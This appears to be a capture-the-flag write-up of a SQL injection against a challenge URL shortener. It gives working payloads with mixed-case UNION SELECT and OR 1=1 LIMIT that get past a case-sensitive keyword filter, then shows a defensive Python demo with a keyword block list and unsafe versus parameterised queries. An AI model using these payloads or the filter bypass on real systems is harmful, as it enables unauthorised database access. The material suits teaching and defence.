The whole task came down to two points:
- Find the SQL injection
- Exploit it, bypassing the WAF
The first point was found by arekusux, who reported it in the team conference chat:
sci.nuitduhack.com/sa' or '1' ='1
This is the most common syntax for this kind of injection, and the script redirects to Google (that is, to the first entry in the database).
Next, any valid syntax using union or UNION always produced an error, regardless of how many columns were used.
As it turned out, the filter simply stripped keywords written entirely in lowercase or entirely in uppercase (a simple WAF), so mixed case passed through. As a result, the injection could be performed as follows:
http://sci.nuitduhack.com/sa' UnION SELeCT USER () -- - (the table has just one column)
http://sci.nuitduhack.com/sa' or 1=1 LIMIT 1,1 -- -
http://sci.nuitduhack.com/sa' or 1=1 LIMIT 2,1 -- -
http://sci.nuitduhack.com/sa' or 1 =1 LIMIT 7,1 -- -
And the seventh link leads to the key: http://sci.nuitduhack.com/mMVzJ8Qj/flag.txt
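An added example, not part of the original writeup, that reproduces the two defensive lessons above on a constructed in-memory table: a keyword filter that only matches exact case lets the mixed-case payload through, while a case-insensitive check catches it, and a parameterised query removes the injection entirely. Table name, column names and rows are invented for the demo.

```python
import re
import sqlite3

# Constructed keyword list of the kind a simple WAF strips literally.
BLOCKED_KEYWORDS = ("UNION", "SELECT", "union", "select")


def naive_waf_blocks(query_string: str) -> bool:
    """Exact-case substring match: all-lower and all-upper keywords are caught,
    mixed case such as UnION / SELeCT is not."""
    return any(kw in query_string for kw in BLOCKED_KEYWORDS)


def normalized_waf_blocks(query_string: str) -> bool:
    """Case-insensitive word match: the same payload is caught regardless of case."""
    return re.search(r"\b(union|select)\b", query_string, re.IGNORECASE) is not None


def build_demo_db() -> sqlite3.Connection:
    """Constructed link table: slug -> redirect target (first row is Google)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE links (slug TEXT, url TEXT)")
    conn.executemany(
        "INSERT INTO links VALUES (?, ?)",
        [("g", "https://google.com"), ("x", "https://example.org")],
    )
    return conn


def lookup_unsafe(conn: sqlite3.Connection, slug: str) -> list:
    """Vulnerable pattern: the slug is concatenated into the SQL text,
    so quotes, OR, LIMIT and comments in it become part of the query."""
    return conn.execute(f"SELECT url FROM links WHERE slug = '{slug}'").fetchall()


def lookup_safe(conn: sqlite3.Connection, slug: str) -> list:
    """Fixed pattern: the slug is bound as a parameter and never parsed as SQL."""
    return conn.execute("SELECT url FROM links WHERE slug = ?", (slug,)).fetchall()
```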